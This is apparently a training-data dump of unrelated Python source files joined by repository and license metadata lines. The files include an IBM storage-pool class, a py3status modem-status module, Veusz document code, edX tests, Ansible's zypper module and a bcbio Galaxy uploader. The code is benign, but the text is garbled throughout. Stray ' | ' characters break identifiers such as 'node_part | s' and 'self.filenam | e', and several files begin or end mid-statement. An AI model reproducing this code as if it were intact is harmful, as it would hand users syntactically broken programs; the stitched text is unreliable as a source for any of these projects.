node_parts = node_vios.split('/')
ms_id = node_part | s[-3]
vios_id = node_parts[-1]
return ms_id, vios_id
class ImagePool(object):
def __init__(self, cs, cluster_id, existing=None, fake=None):
if MOCK:
self._cs = cs
self._cluster = None
self._ssp_id = None
self._ssp = None
self._fake = True # MOCK is always fake
self._next = 0
if fake is not None:
prefix, num_images, image | _size, thin, lut = fake
self._images = num_images * [None]
else:
self._images = len(existing) * [None]
return
self._cs = cs
self._cluster = self._cs.cluster.get(cluster_id)
self._ssp_id = self._cluster.sharedstoragepool_id()
self._ssp = self._cs.sharedstoragepool.get(self._ssp_id)
self._images = []
self._next = 0
# vios
self._vios_ips = []
for node in self._cluster.node.node:
if not node.virtual_io_server:
print(_("Node: >%s<,"
" has no virtual_io_server,"
" continuing ...") % node.partition_name)
ms_id, vios_id = _parse_vios(node.virtual_io_server)
try:
vios = cs.\
virtualioserver.get(ms_id,
vios_id,
xag=["None"])
except Exception as e:
msg = _("Failed to retrieve"
" node: >%s<,"
" msg: >%s<,"
" continuing ...")
raise Exception(msg % (node.partition_name, e))
self._vios_ips.append(vios.resource_monitoring_ip_address)
# if fake is not None then (mock) image LUs will be created
self._fake = False
if existing is None and fake is None:
raise ValueError("must specify existing or fake")
if existing is not None and fake is not None:
x = "must specify either existing or fake, but not both"
raise ValueError(x)
if fake is not None:
self._fake = True
prefix, num_images, image_size, thin, lut = fake
n = cs.sharedstoragepool.create_unique_name
images = [(n("%s%07d" % (prefix, i,)),
image_size, thin, lut) for i in range(num_images)]
(image_lu_pool, self._ssp) = self._ssp.update_append_lus(images)
# self._images = [lu.unique_device_id for |
hburg1234/py3status | py3status/modules/wwan_status.py | Python | bsd-3-clause | 7,301 | 0.000274 | # -*- coding: utf-8 -*-
"""
Display current network and ip address for newer Huwei modems.
It is tested for Huawei E3276 (usb-id 12d1:1506) aka Telekom Speed
Stick LTE III but may work on other devices, too.
DEPENDENCIES:
- netifaces
- pyserial
Configuration parameters:
- baudrate : There should be no need to configure this, but
feel free to experiment.
Default is 115200.
- cache_timeout : How often we refresh | this module in seconds.
Default is 5.
- consider_3G_degraded : If set to True, only 4G-networks will be
considered 'good'; 3G connections are shown
as 'degraded', which is yellow by default. Mostly
useful if you want to keep track of | where there
is a 4G connection.
Default is False.
- format_down : What to display when the modem is not plugged in
Default is: 'WWAN: down'
- format_error : What to display when modem can't be accessed.
Default is 'WWAN: {error}'
- format_no_service : What to display when the modem does not have a
network connection. This allows to omit the then
meaningless network generation. Therefore the
default is 'WWAN: ({status}) {ip}'
- format_up : What to display upon regular connection
Default is 'WWAN: ({status}/{netgen}) {ip}'
- interface : The default interface to obtain the IP address
from. For wvdial this is most likely ppp0.
For netctl it can be different.
Default is: ppp0
- modem : The device to send commands to. Default is
- modem_timeout : The timespan betwenn querying the modem and
collecting the response.
Default is 0.4 (which should be sufficient)
@author Timo Kohorst timo@kohorst-online.com
PGP: B383 6AE6 6B46 5C45 E594 96AB 89D2 209D DBF3 2BB5
"""
import subprocess
import netifaces as ni
import os
import stat
import serial
from time import time, sleep
class Py3status:
baudrate = 115200
cache_timeout = 5
consider_3G_degraded = False
format_down = 'WWAN: down'
format_error = 'WWAN: {error}'
format_no_service = 'WWAN: {status} {ip}'
format_up = 'WWAN: {status} ({netgen}) {ip}'
interface = "ppp0"
modem = "/dev/ttyUSB1"
modem_timeout = 0.4
def wwan_status(self, i3s_output_list, i3s_config):
query = "AT^SYSINFOEX"
target_line = "^SYSINFOEX"
# Set up the highest network generation to display as degraded
if self.consider_3G_degraded:
degraded_netgen = 3
else:
degraded_netgen = 2
response = {}
response['cached_until'] = time() + self.cache_timeout
# Check if path exists and is a character device
if os.path.exists(self.modem) and stat.S_ISCHR(os.stat(
self.modem).st_mode):
print("Found modem " + self.modem)
try:
ser = serial.Serial(
port=self.modem,
baudrate=self.baudrate,
# Values below work for my modem. Not sure if
# they neccessarily work for all modems
parity=serial.PARITY_ODD,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS)
if ser.isOpen():
ser.close()
ser.open()
ser.write((query + "\r").encode())
print("Issued query to " + self.modem)
sleep(self.modem_timeout)
n = ser.inWaiting()
modem_response = ser.read(n)
ser.close()
except:
# This will happen...
# 1) in the short timespan between the creation of the device node
# and udev changing the permissions. If this message persists,
# double check if you are using the proper device file
# 2) if/when you unplug the device
PermissionError
print("Permission error")
response['full_text'] = self.format_error.format(
error="no access to " + self.modem)
response['color'] = i3s_config['color_bad']
return response
# Dissect response
for line in modem_response.decode("utf-8").split('\n'):
print(line)
if line.startswith(target_line):
# Determine IP once the modem responds
ip = self._get_ip(self.interface)
if not ip:
ip = "no ip"
modem_answer = line.split(',')
netgen = len(modem_answer[-2]) + 1
netmode = modem_answer[-1].rstrip()[1:-1]
if netmode == "NO SERVICE":
response['full_text'] = self.format_no_service.format(
status=netmode,
ip=ip)
response['color'] = i3s_config['color_bad']
else:
response['full_text'] = self.format_up.format(
status=netmode,
netgen=str(netgen) + "G",
ip=ip)
if netgen <= degraded_netgen:
response['color'] = i3s_config['color_degraded']
else:
response['color'] = i3s_config['color_good']
elif line.startswith("COMMAND NOT SUPPORT") or line.startswith(
"ERROR"):
response['color'] = i3s_config['color_bad']
response['full_text'] = self.format_error.format(
error="unsupported modem")
else:
# Outputs can be multiline, so just try the next one
pass
else:
print(self.modem + " not found")
response['color'] = i3s_config['color_bad']
response['full_text'] = self.format_down
return response
def _get_ip(self, interface):
"""
Returns the interface's IPv4 address if device exists and has a valid
ip address. Otherwise, returns an empty string
"""
if interface in ni.interfaces():
addresses = ni.ifaddresses(interface)
if ni.AF_INET in addresses:
return addresses[ni.AF_INET][0]['addr']
return ""
if __name__ == "__main__":
from time import sleep
x = Py3status()
config = {
'color_good': '#00FF00',
'color_bad': '#FF0000',
'color_degraded': '#FFFF00',
}
while True:
print(x.wwan_status([], config))
sleep(1)
|
arichar6/veusz | veusz/document/doc.py | Python | gpl-2.0 | 21,692 | 0.001337 | # document.py
# A module to handle documents
# Copyright (C) 2004 Jeremy S. Sanders
# Email: Jeremy Sanders <jeremy@jeremysanders.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##############################################################################
"""A class to represent Veusz documents, with dataset classes."""
from __future__ import division, print_function, absolute_import
import codecs
import os.path
import traceback
import datetime
from collections import defaultdict
try:
import h5py
except ImportError:
h5py = None
from ..compat import citems, cvalues, cstr, CStringIO, cexecfile
from .. import qtall as qt4
from . import widgetfactory
from . import painthelper
from . import evaluate
from .. import datasets
from .. import utils
from .. import setting
def _(text, disambiguation=None, context="Document"):
"""Translate text."""
return qt4.QCoreApplication.translate(context, text, disambiguation)
def getSuitableParent(widgettype, initialwidget):
"""Find the nearest relevant parent for the widgettype given."""
# find the parent to add the child to, we go up the tree looking
# for possible parents
parent = initialwidget
wc = widgetfactory.thefactory.getWidgetClass(widgettype)
while parent is not None and not wc.willAllowParent(parent):
parent = parent.parent
return parent
class DocSuspend(object):
"""Handle document updates/suspensions."""
def __init__(self, doc):
self.doc = doc
def __enter__(self):
self.doc.suspendUpdates()
return self
def __exit__(self, type, value, traceback):
self.doc.enableUpdates()
class Document(qt4.QObject):
"""Document class for holding the graph data.
"""
pluginsloaded = False
# this is emitted when the document is modified
signalModified = qt4.pyqtSignal(int)
# emited to log a message
sigLog = qt4.pyqtSignal(cstr)
# emitted when document wiped
sigWiped = qt4.pyqtSignal()
# to ask whether the import is allowed (module name and symbol list)
sigAllowedImports = qt4.pyqtSignal(cstr, list)
def __init__(self):
"""Initialise the document."""
qt4.QObject.__init__( self )
if not Document.pluginsloaded:
Document.loadPlugins()
Document.pluginsloaded = True
# change tracking of document as a whole
self.changeset = 0 # increased when the document changes
# map tags to dataset names
self.datasettags = defaultdict(list)
# if set, do not notify listeners of updates
# wait under enableUpdates
self.suspendupdates = []
# default document locale
self.locale = qt4.QLocale()
# evaluation context
self.evaluate = evaluate.Evaluate(self)
self.clearHistory()
self.wipe()
def wipe(self):
"""Wipe out any stored data."""
self.data = {}
self.basewidget = widgetfactory.thefactory.makeWidget(
'document', None, self)
self.setModified(False)
self.filenam | e = ""
self.evaluate.wipe()
self.sigWiped.emit()
def clearHistory(self):
"""Clear any history."""
self.historybatch = []
self.historyundo = []
self.historyredo = []
def suspendUpdates(self):
"""Holds sending update messages.
This speeds up modification of the document and prevents the document
from being updated on the screen."""
self.suspendupdat | es.append(self.changeset)
def enableUpdates(self):
"""Reenables document updates."""
changeset = self.suspendupdates.pop()
if not self.suspendupdates and changeset != self.changeset:
# bump this up as some watchers might ignore this otherwise
self.changeset += 1
self.setModified()
def suspend(self):
"""Return context manager for suspending updates."""
return DocSuspend(self)
def makeDefaultDoc(self):
"""Add default widgets to create document."""
page = widgetfactory.thefactory.makeWidget('page', self.basewidget, self)
widgetfactory.thefactory.makeWidget('graph', page, self)
self.setModified()
self.setModified(False)
self.changeset = 0
def log(self, message):
"""Log a message - this is emitted as a signal."""
self.sigLog.emit(message)
def applyOperation(self, operation, redoing=False):
"""Apply operation to the document.
Operations represent atomic actions which can be done to the document
and undone.
Updates are suspended during the operation.
If redoing is not True, the redo stack is cleared
"""
with DocSuspend(self):
retn = operation.do(self)
self.changeset += 1
if self.historybatch:
# in batch mode, create an OperationMultiple for all changes
self.historybatch[-1].addOperation(operation)
else:
# standard mode
self.historyundo = self.historyundo[-9:] + [operation]
if not redoing:
self.historyredo = []
return retn
def batchHistory(self, batch):
"""Enable/disable batch history mode.
In this mode further operations are added to the OperationMultiple specified,
until batchHistory is called with None.
The objects are pushed into a list and popped off
This allows multiple operations to be batched up for simple undo.
"""
if batch:
self.historybatch.append(batch)
else:
self.historybatch.pop()
def undoOperation(self):
"""Undo the previous operation."""
operation = self.historyundo.pop()
with DocSuspend(self):
operation.undo(self)
self.changeset += 1
self.historyredo.append(operation)
def canUndo(self):
"""Returns True if previous operation can be removed."""
return len(self.historyundo) != 0
def redoOperation(self):
"""Redo undone operations."""
operation = self.historyredo.pop()
return self.applyOperation(operation, redoing=True)
def canRedo(self):
"""Returns True if previous operation can be redone."""
return len(self.historyredo) != 0
def isBlank(self):
"""Is the document unchanged?"""
return self.changeset == 0
def setData(self, name, dataset):
"""Set dataset in document."""
self.data[name] = dataset
dataset.document = self
# update the change tracking
self.setModified()
def deleteData(self, name):
"""Remove a dataset"""
del self.data[name]
self.setModified()
def modifiedData(self, dataset):
"""Notify dataset was modified"""
assert dataset in self.data.values()
self.setModified()
def getLinkedFiles(self, filenames=None):
"""Get a list of LinkedFile objects used by the document.
if filenames is a set, only get the objects with filenames given
"""
links = set()
for ds in cvalues(self.data):
if ds.linked and (filenames is None or
ds.linked.filename in filenames):
links.add(ds.linked)
return list(links)
def reloadLinkedDatasets(self, filenames=None):
"""Reload linked datasets |
jolyonb/edx-platform | lms/djangoapps/course_api/blocks/tests/test_api.py | Python | agpl-3.0 | 9,363 | 0.002563 | """
Tests for Blocks api.py
"""
from itertools import product
from mock import patch
import ddt
from django.test.client import RequestFactory
from openedx.core.djangoapps.content.block_structure.api import clear_course_from_cache
from openedx.core.djangoapps.content.block_structure.config import STORAGE_BACKING_FOR_CACHE, waffle
from student.tests.factories import UserFactory
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import SampleCourseFactory, check_mongo_calls
from xmodule.modulestore.tests.sample_courses import BlockInfo
from ..api import get_blocks
class TestGetBlocks(SharedModuleStoreTestCase):
"""
Tests for the get_blocks function
"""
@classmethod
def setUpClass(cls):
super(TestGetBlocks, cls).setUpClass()
with cls.store.default_store(ModuleStoreEnum.Type.split):
cls.course = SampleCourseFactory.create()
# hide t | he html block
cls.html_block = cls.store.get_item(cls.course.id.make_usage_key('html', 'html_x1a_1'))
cls.html_block.visible_to_staff_only = True
cls.store.update_item(cls.html_block, ModuleStoreEnum.UserID.test)
def setUp(self):
super(TestGetBlocks, self).setUp()
self.user = UserFactory.create()
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
def test_basic(self):
blocks = get_blocks(self.request, self.c | ourse.location, self.user)
self.assertEquals(blocks['root'], unicode(self.course.location))
# subtract for (1) the orphaned course About block and (2) the hidden Html block
self.assertEquals(len(blocks['blocks']), len(self.store.get_items(self.course.id)) - 2)
self.assertNotIn(unicode(self.html_block.location), blocks['blocks'])
def test_no_user(self):
blocks = get_blocks(self.request, self.course.location)
self.assertIn(unicode(self.html_block.location), blocks['blocks'])
def test_access_before_api_transformer_order(self):
"""
Tests the order of transformers: access checks are made before the api
transformer is applied.
"""
blocks = get_blocks(self.request, self.course.location, self.user, nav_depth=5, requested_fields=['nav_depth'])
vertical_block = self.store.get_item(self.course.id.make_usage_key('vertical', 'vertical_x1a'))
problem_block = self.store.get_item(self.course.id.make_usage_key('problem', 'problem_x1a_1'))
vertical_descendants = blocks['blocks'][unicode(vertical_block.location)]['descendants']
self.assertIn(unicode(problem_block.location), vertical_descendants)
self.assertNotIn(unicode(self.html_block.location), vertical_descendants)
def test_sub_structure(self):
sequential_block = self.store.get_item(self.course.id.make_usage_key('sequential', 'sequential_y1'))
blocks = get_blocks(self.request, sequential_block.location, self.user)
self.assertEquals(blocks['root'], unicode(sequential_block.location))
self.assertEquals(len(blocks['blocks']), 5)
for block_type, block_name, is_inside_of_structure in (
('vertical', 'vertical_y1a', True),
('problem', 'problem_y1a_1', True),
('chapter', 'chapter_y', False),
('sequential', 'sequential_x1', False),
):
block = self.store.get_item(self.course.id.make_usage_key(block_type, block_name))
if is_inside_of_structure:
self.assertIn(unicode(block.location), blocks['blocks'])
else:
self.assertNotIn(unicode(block.location), blocks['blocks'])
def test_filtering_by_block_types(self):
sequential_block = self.store.get_item(self.course.id.make_usage_key('sequential', 'sequential_y1'))
# not filtered blocks
blocks = get_blocks(self.request, sequential_block.location, self.user, requested_fields=['type'])
self.assertEquals(len(blocks['blocks']), 5)
found_not_problem = False
for block in blocks['blocks'].itervalues():
if block['type'] != 'problem':
found_not_problem = True
self.assertTrue(found_not_problem)
# filtered blocks
blocks = get_blocks(self.request, sequential_block.location, self.user,
block_types_filter=['problem'], requested_fields=['type'])
self.assertEquals(len(blocks['blocks']), 3)
for block in blocks['blocks'].itervalues():
self.assertEqual(block['type'], 'problem')
# TODO: Remove this class after REVE-52 lands and old-mobile-app traffic falls to < 5% of mobile traffic
@ddt.ddt
class TestGetBlocksMobileHack(SharedModuleStoreTestCase):
"""
Tests that requests from the mobile app don't receive empty containers.
"""
@classmethod
def setUpClass(cls):
super(TestGetBlocksMobileHack, cls).setUpClass()
with cls.store.default_store(ModuleStoreEnum.Type.split):
cls.course = SampleCourseFactory.create(
block_info_tree=[
BlockInfo('empty_chapter', 'chapter', {}, [
BlockInfo('empty_sequential', 'sequential', {}, [
BlockInfo('empty_vertical', 'vertical', {}, []),
]),
]),
BlockInfo('full_chapter', 'chapter', {}, [
BlockInfo('full_sequential', 'sequential', {}, [
BlockInfo('full_vertical', 'vertical', {}, [
BlockInfo('html', 'html', {}, []),
]),
]),
])
]
)
def setUp(self):
super(TestGetBlocksMobileHack, self).setUp()
self.user = UserFactory.create()
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
@ddt.data(
*product([True, False], ['chapter', 'sequential', 'vertical'])
)
@ddt.unpack
def test_empty_containers(self, is_mobile, container_type):
with patch('lms.djangoapps.course_api.blocks.api.is_request_from_mobile_app', return_value=is_mobile):
blocks = get_blocks(self.request, self.course.location)
full_container_key = self.course.id.make_usage_key(container_type, 'full_{}'.format(container_type))
self.assertIn(str(full_container_key), blocks['blocks'])
empty_container_key = self.course.id.make_usage_key(container_type, 'empty_{}'.format(container_type))
assert_containment = self.assertNotIn if is_mobile else self.assertIn
assert_containment(str(empty_container_key), blocks['blocks'])
@ddt.ddt
class TestGetBlocksQueryCountsBase(SharedModuleStoreTestCase):
"""
Base for the get_blocks tests.
"""
ENABLED_SIGNALS = ['course_published']
def setUp(self):
super(TestGetBlocksQueryCountsBase, self).setUp()
self.user = UserFactory.create()
self.request = RequestFactory().get("/dummy")
self.request.user = self.user
def _create_course(self, store_type):
"""
Creates the sample course in the given store type.
"""
with self.store.default_store(store_type):
return SampleCourseFactory.create()
def _get_blocks(self, course, expected_mongo_queries, expected_sql_queries):
"""
Verifies the number of expected queries when calling
get_blocks on the given course.
"""
with check_mongo_calls(expected_mongo_queries):
with self.assertNumQueries(expected_sql_queries):
get_blocks(self.request, course.location, self.user)
@ddt.ddt
class TestGetBlocksQueryCounts(TestGetBlocksQueryCountsBase):
"""
Tests query counts for the get_blocks function.
"""
@ddt.data(
*product(
(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split),
(True, False),
)
)
@ddt.unpack
def test_ |
kbrebanov/ansible | lib/ansible/modules/packaging/os/zypper.py | Python | gpl-3.0 | 17,518 | 0.003768 | #!/usr/bin/python -tt
# -*- coding: utf-8 -*-
# (c) 2013, Patrick Callahan <pmc@patrickcallahan.com>
# based on
# openbsd_pkg
# (c) 2013
# Patrik Lundin <patrik.lundin.swe@gmail.com>
#
# yum
# (c) 2012, Red Hat, Inc
# Written by Seth Vidal <skvidal at fedoraproject.org>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: zypper
author:
- "Patrick Callahan (@dirtyharrycallahan)"
- "Alexander Gubin (@alxgu)"
- "Thomas O'Donnell (@andytom)"
- "Robin Roth (@robinro)"
- "Andrii Radyk (@AnderEnder)"
version_added: "1.2"
short_description: Manage packages on SUSE and openSUSE
description:
- Manage packages on SUSE and openSUSE using the zypper and rpm tools.
options:
name:
description:
- Package name C(name) or package specifier or a list of either.
- Can include a version like C(name=1.0), C(name>3.4) or C(name<=2.7). If a version is given, C(oldpackage) is implied and zypper is allowed to
update the package within the version range given.
- You can also pass a url or a local path to a rpm file.
- When using state=latest, this can be '*', which updates all installed packages.
required: true
aliases: [ 'pkg' ]
state:
description:
- C(present) will make sure the package is installed.
C(latest) will make sure the latest version of the package is installed.
C(absent) will make sure the specified package is not installed.
C(dist-upgrade) will make sure the latest version of all installed packages from all enabled repositories is installed.
- When using C(dist-upgrade), I(name) should be C('*').
required: false
choices: [ present, latest, absent, dist-upgrade ]
default: "present"
type:
description:
- The type of package to be operated on.
required: false
choices: [ package, patch, pattern, product, srcpackage, application ]
default: "package"
version_added: "2.0"
disable_gpg_check:
description:
- Whether to disable to GPG signature checking of the package
signature being installed. Has an effect only if state is
I(present) or I(latest).
required: false
default: "no"
choices: [ "yes", "no" ]
disable_recommends:
version_added: "1.8"
description:
- Corresponds to the C(--no-recommends) option for I(zypper). Default behavior (C(yes)) modifies zypper's default behavior; C(no) does
install recommended packages.
required: false
default: "yes"
choices: [ "yes", "no" ]
force:
version_added: "2.2"
description:
- Adds C(--force) option to I(zypper). Allows to downgrade packages and change vendor or architecture.
required: false
default: "no"
choices: [ "yes", "no" ]
update_cache:
version_added: "2.2"
description:
- Run the equivalent of C(zypper refresh) before the operation. Disabled in check mode.
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: [ "refresh" ]
oldpackage:
version_added: "2.2"
description:
- Adds C(--oldpackage) option to I(zypper). Allows to downgrade packages with less side-effects than force. This is implied as soon as a
version is specified as part of the package name.
required: false
default: "no"
choices: [ "yes", "no" ]
extra_args:
version_added: "2.4"
required: false
description:
- Add additional options to C(zypper) command.
- Options should be supplied in a single line as if given in the command line.
notes:
- When used with a `loop:` each package will be processed individually,
it is much more efficient to pass the list directly to the `name` option.
# informational: requirements for nodes
requirements:
- "zypper >= 1.0 # included in openSuSE >= 11.1 or SuSE Linux Enterprise Server/Desktop >= 11.0"
- python-xml
- rpm
'''
EXAMPLES = '''
# Install "nmap"
- zypper:
name: nmap
state: present
# Install apache2 with recommended packages
- zypper:
name: apache2
state: present
disable_recommends: no
# Apply a given patch
- zypper:
name: openSUSE-2016-128
state: present
type: patch
# Remove the "nmap" package
- zypper:
name: nmap
state: absent
# Install the nginx rpm from a remote repo
- zypper:
name: 'http://nginx.org/packages/sles/12/x86_64/RPMS/nginx-1.8.0-1.sles12.ngx.x86_64.rpm'
state: present
# Install local rpm file
- zypper:
name: /tmp/fancy-software.rpm
state: present
# Update all packages
- zypper:
name: '*'
state: latest
# Apply all available patches
- zypper:
name: '*'
state: latest
type: patch
# Perform a dist-upgrade with additional arguments
- zypper:
name: '*'
state: dist-upgrade
extra_args: '--no-allow-vendor-change --allow-arch-change'
# Refresh repositories and update package "openssl"
- zypper:
name: openssl
state: present
update_cache: yes
# Install specific version (possible comparisons: <, >, <=, >=, =)
- zypper:
name: 'docker>=1.10'
state: present
# Wait 20 seconds to acquire the lock before failing
- zypper:
name: mosh
state: present
environment:
ZYPP_LOCK_TIMEOUT: 20
'''
import xml
import re
from xml.dom.minidom import parseString as parseXML
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
class Package:
def __init__(self, name, prefix, version):
self.name = name
self.prefix = prefix
self.version = version
self.shouldinstall = (prefix == '+')
def __str__(self):
return self.prefix + self.name + self.version
def split_name_version(name):
"""splits of the package name and desired version
example formats:
- docker>=1.10
- apache=2.4
Allowed ve | rsion specifiers: <, >, <=, >=, =
| Allowed version format: [0-9.-]*
Also allows a prefix indicating remove "-", "~" or install "+"
"""
prefix = ''
if name[0] in ['-', '~', '+']:
prefix = name[0]
name = name[1:]
if prefix == '~':
prefix = '-'
version_check = re.compile('^(.*?)((?:<|>|<=|>=|=)[0-9.-]*)?$')
try:
reres = version_check.match(name)
name, version = reres.groups()
if version is None:
version = ''
return prefix, name, version
except:
return prefix, name, ''
def get_want_state(names, remove=False):
packages = []
urls = []
for name in names:
if '://' in name or name.endswith('.rpm'):
urls.append(name)
else:
prefix, pname, version = split_name_version(name)
if prefix not in ['-', '+']:
if remove:
prefix = '-'
else:
prefix = '+'
packages.append(Package(pname, prefix, version))
return packages, urls
def get_installed_state(m, packages):
"get installed state of packages"
cmd = get_cmd(m, 'search')
cmd.extend(['--match-exact', '--details', '--installed-only'])
cmd.extend([p.name for p in packages])
return parse_zypper_xml(m, cmd, fail_not_found=False)[0]
def parse_zypper_xml(m, cmd, fail_not_found=True, packages=None):
rc, stdout, stderr = m.run_command(cmd, check_rc=False)
try:
dom = parseXML(stdout)
except xml.parsers.expat.ExpatError as exc:
m.fail_json(msg="Failed to parse zypper xml output: %s" % to_native(exc),
rc=rc, stdout=stdout, stderr=stderr, cmd=cmd)
if rc == 104:
# exit code 1 |
Cyberbio-Lab/bcbio-nextgen | bcbio/upload/galaxy.py | Python | mit | 8,109 | 0.004316 | """Move files to local Galaxy upload directory and add to Galaxy Data Libraries.
Required configurable variables in upload:
dir
"""
import collections
import os
import shutil
import time
from bcbio import utils
from bcbio.log import logger
from bcbio.upload import filesystem
from bcbio.pipeline import qcsummary
# Avoid bioblend import errors, raising at time of use
try:
import bioblend
from bioblend.galaxy import GalaxyInstance
import simplejson
except ImportError:
GalaxyInstance, bioblend, simplejson = None, None, None
def update_file(finfo, sample_info, config):
"""Update file in Galaxy data libraries.
"""
if GalaxyInstance is None:
raise ImportError("Could not import bioblend.galaxy")
if "dir" not in config:
raise ValueError("Galaxy upload requires `dir` parameter in config specifying the "
"shared filesystem path to move files to.")
if "outputs" in config:
_galaxy_tool_copy(finfo, config["outputs"])
else:
_galaxy_library_upload(finfo, sample_info, config)
def _galaxy_tool_copy(finfo, outputs):
"""Copy information directly to pre-defined outputs from a Galaxy tool.
XXX Needs generalization
"""
tool_map = {"align": "bam", "variants": "vcf.gz"}
for galaxy_key, finfo_type in tool_map.items():
if galaxy_key in outputs and finfo.get("type") == finfo_type:
shutil.copy(finfo["path"], outputs[galaxy_key])
def _galaxy_library_upload(finfo, sample_info, config):
"""Upload results to galaxy library.
"""
folder_name = "%s_%s" % (config["fc_date"], config["fc_name"])
storage_dir = utils.safe_makedir(os.path.join(config["dir"], folder_name))
if finfo.get("type") == "directory":
storage_file = None
if finfo.get("ext") == "qc":
pdf_file = qcsummary.prep_pdf(finfo["path"], config)
if pdf_file:
finfo["path"] = pdf_file
finfo["type"] = "pdf"
storage_file = filesystem.copy_finfo(finfo, storage_dir, pass_uptodate=True)
else:
storage_file = filesystem.copy_finfo(finfo, storage_dir, pass_uptodate=True)
if "galaxy_url" in config and "galaxy_api_key" in config:
galaxy_url = config["galaxy_url"]
if not galaxy_url.endswith("/"):
galaxy_url += "/"
gi = GalaxyInstance(galaxy_url, config["galaxy_api_key"])
else:
raise ValueError("Galaxy upload requires `galaxy_url` and `galaxy_api_key` in config")
if storage_file and sample_info and not finfo.get("index", False) and not finfo.get("plus", False):
_to_datalibrary_safe(storage_file, gi, folder_name, sample_info, config)
def _to_datalibrary_safe(fname, gi, folder_name, sample_info, config):
"""Upload with retries for intermittent JSON failures.
"""
num_tries = 0
max_tries = 5
while 1:
try:
_to_datalibrary(fname, gi, folder_name, sample_info, config)
break
except (simplejson.scanner.JSONDecodeError, bioblend.galaxy.client.ConnectionError) as e:
num_tries += 1
if num_tries > max_tries:
raise
print "Retrying upload, failed with:", str(e)
time.sleep(5)
def _to_datalibrary(fname, gi, folder_name, sample_info, config):
"""Upload a file to a Galaxy data library in a project specific folder.
"""
library = _get_library(gi, sample_info, config)
libitems = gi.libraries.show_library(library.id, contents=True)
folder = _get_folder(gi, folder_name, library, libitems)
_file_to_folder(gi, fname, sample_info, libitems, library, folder)
def _file_to_folder(gi, fname, sample_info, libitems, library, folder):
"""Check if file exists on Galaxy, if not upload to specified folder.
"""
full_name = os.path.join(folder["name"], os.path.basename(fname))
# Handle VCF: Galaxy reports VCF files without the gzip extension
file_type = "vcf_bgzip" if full_name.endswith(".vcf.gz") else "auto"
if full_name.endswith(".vcf.gz"):
full_name = full_name.replace(".vcf.gz", ".vcf")
for item in libitems:
if item["name"] == full_name:
return item
logger.info("Uploading to Galaxy library '%s': %s" % (library.name, full_name))
return gi.libraries.upload_from_galaxy_filesystem(str(library.id), fname, folder_id=str(folder["id"]),
link_data_only="link_to_files",
dbkey=sample_info["genome_build"],
file_type=file_type,
roles=str(library.roles) if library.roles else None)
def _get_folder(gi, folder_name, library, libitems):
"""Retrieve or create a folder inside the library with the specified name.
"""
for item in libitems:
if item["type"] == "folder" and item["name"] == "/%s" % folder_name:
return item
return gi.libraries.create_folder(library.id, folder_name)[0]
GalaxyLibrary = collections.namedtuple("GalaxyLibrary", ["id", "name", "roles"])
def _get_library(gi, sample_info, config):
"""Retrieve the appropriate data library for the current user.
"""
galaxy_lib = sample_info.get("galaxy_library",
config.get("galaxy_library"))
role = sample_info.get("galaxy_role",
config.get("galaxy_role"))
if galaxy_lib:
return _get_library_from_name(gi, galaxy_lib, role, sample_info, create=True)
elif config.get("private_libs") or config.get("lab_association") or config.get("researcher"):
return _library_from_nglims(gi, sample_info, config)
else:
raise ValueError("No Galaxy library specified for sample: %s" %
sample_info["description"])
def _get_library_from_name(gi, name, role, sample_info, create=False):
for lib in gi.libraries.get_libraries():
if lib["name"].lower() == name.lower() and not lib.get("deleted", False):
return GalaxyLibrary(lib["id"], lib["name"], role)
if create and name:
logger.info("Creating Galaxy library: '%s'" % name)
lib = gi.libraries.create_library(name)
librole = str(gi.users.get_current_user()["id"] if not role else role)
try:
gi.libraries.set_library_permissions(str(lib["id"]), librole, librole, librole, librole)
# XXX Returns error on Galaxy side but seems to work -- ugly
except:
pass
return GalaxyLibrary(lib["id"], lib["name"], role)
else:
raise ValueError("Could not find Galaxy library matching '%s' for sample %s" %
(name, sample_info["description"]))
def _library_from_nglims(gi, sample_info, config):
"""Retrieve upload library from nglims specified user libraries.
"""
names = [config.get(x, "").strip() for x in ["lab_association", "researcher"]
if config.get(x)]
for name in names:
for ext in ["sequencing", "lab"]:
check_name = "%s %s" % (name.split()[0], ext)
try:
return | _get_l | ibrary_from_name(gi, check_name, None, sample_info)
except ValueError:
pass
check_names = set([x.lower() for x in names])
for libname, role in config["private_libs"]:
# Try to find library for lab or rsearcher
if libname.lower() in check_names:
return _get_library_from_name(gi, libname, role, sample_info)
# default to first private library if available
if len(config.get("private_libs", [])) > 0:
libname, role = config["private_libs"][0]
return _get_library_from_name(gi, libname, role, sample_info)
# otherwise use the lab association or researcher name
elif len(names) > 0:
return _get_library_from_name(gi, names[0], None, sample_info, create=True)
else:
raise ValueError("Could not find Galaxy library for sample %s" % sample_info["description"])
|
pez2001/sVimPy | test_scripts/test53.py | Python | gpl-2.0 | 33 | 0.060606 | a = {i*i for | i in (1,2)}
print | (a) |
sghai/robottelo | tests/foreman/cli/test_subscription.py | Python | gpl-3.0 | 28,458 | 0 | """Test class for Subscriptions
:Requirement: Subscription
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: CLI
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
import tempfile
import csv
import os
from robottelo import manifests
from robottelo.cli.activationkey import ActivationKey
from robottelo.cli.base import CLIReturnCodeError
from robottelo.cli.csv_ import CSV_
from robottelo.cli.factory import (
activationkey_add_subscription_to_repo,
make_activation_key,
make_lifecycle_environment,
make_org,
setup_org_for_a_rh_repo,
)
